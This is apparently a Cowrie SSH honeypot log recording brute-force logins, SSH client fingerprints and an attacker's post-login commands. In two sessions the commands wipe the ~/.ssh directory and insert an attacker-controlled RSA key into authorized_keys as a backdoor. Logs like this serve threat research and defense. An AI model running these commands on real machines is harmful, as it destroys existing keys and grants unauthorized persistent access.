{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.264802Z","src_ip":"212.227.125.160","session":"a78987b1e415"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:03:37.322466Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.323224Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.324119Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.408923Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:03:37.645054Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.645762Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.732174Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.733026Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34464,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a80e82440b7","protocol":"ssh","message":"New connection: 212.227.235.229:34464 (1.2.3.4:22) [session: 4a80e82440b7]","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.815887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.816487Z","src_ip":"212.227.235.229","session":"4a80e82440b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:03:37.901365Z","src_ip":"212.227.235.229","session":"4a80e82440b7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T08:03:38.285132Z","src_ip":"212.227.235.229","session":"4a80e82440b7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:03:39.374147Z","src_ip":"212.227.235.229","session":"4a80e82440b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34478,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e15adeec262","protocol":"ssh","message":"New connection: 212.227.235.229:34478 (1.2.3.4:22) [session: 6e15adeec262]","sensor":"my-vps","timestamp":"2025-09-09T08:03:39.456776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:03:39.457721Z","src_ip":"212.227.235.229","session":"6e15adeec262"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:03:39.543824Z","src_ip":"212.227.235.229","session":"6e15adeec262"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:03:39.921770Z","src_ip":"212.227.235.229","session":"6e15adeec262"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:03:40.008698Z","src_ip":"212.227.235.229","session":"515cdb86c191"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:03:40.009588Z","src_ip":"212.227.235.229","session":"6e15adeec262"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-09-09T08:03:40.333420Z","src_ip":"212.227.125.160","session":"a78987b1e415"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:03:41.715321Z","src_ip":"212.227.125.160","session":"a78987b1e415"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48384,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f9ed106764d","protocol":"ssh","message":"New connection: 212.227.125.160:48384 (1.2.3.4:22) [session: 6f9ed106764d]","sensor":"my-vps","timestamp":"2025-09-09T08:04:38.276094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:04:38.500737Z","src_ip":"212.227.125.160","session":"6f9ed106764d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:04:39.787098Z","src_ip":"212.227.125.160","session":"6f9ed106764d"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-09-09T08:04:44.091810Z","src_ip":"212.227.125.160","session":"6f9ed106764d"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:04:45.404567Z","src_ip":"212.227.125.160","session":"6f9ed106764d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37314,"dst_ip":"1.2.3.4","dst_port":22,"session":"e80dbdda2822","protocol":"ssh","message":"New connection: 212.227.125.160:37314 (1.2.3.4:22) [session: e80dbdda2822]","sensor":"my-vps","timestamp":"2025-09-09T08:04:54.530383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-09-09T08:04:54.543995Z","src_ip":"212.227.125.160","session":"e80dbdda2822"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40852,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1c96dc4a09a","protocol":"ssh","message":"New connection: 212.227.235.229:40852 (1.2.3.4:22) [session: c1c96dc4a09a]","sensor":"my-vps","timestamp":"2025-09-09T08:04:54.795592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T08:04:54.797231Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-09-09T08:04:54.844983Z","src_ip":"212.227.125.160","session":"e80dbdda2822"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T08:04:54.884313Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.login.success","username":"root","password":"a@1234","message":"login attempt [root/a@1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T08:04:55.218585Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:04:55.411785Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:04:55.412464Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T08:04:55.413557Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T08:04:55.498430Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:04:55.771568Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T08:04:55.772269Z","src_ip":"212.227.235.229","session":"c1c96dc4a09a"}
